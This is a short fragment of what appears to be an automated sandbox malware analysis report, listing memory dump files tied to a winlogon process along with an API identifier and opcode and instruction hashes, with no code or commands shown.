                              • Associated: 00000027.00000002.3002985016.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3004370938.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3005534775.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000027.00000002.3006762105.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_39_2_225dc670000_winlogon.jbxd
                              Similarity
                              • API ID: AllocHeap
                              • String ID:
                              • API String ID: 4292702814-0
                              • Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                              • Instruction ID: 8c995a941c99dfe8ec91a527983bcfb77f5d6b3f54302bc86fbf6d4b88a72ef6
                              • Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                              • Instruction Fuzzy Hash: D1F0B42C306E20B1FF9597ED580C3A412905F99B42F1CDC308E1A8ABC5ED3CC58AC211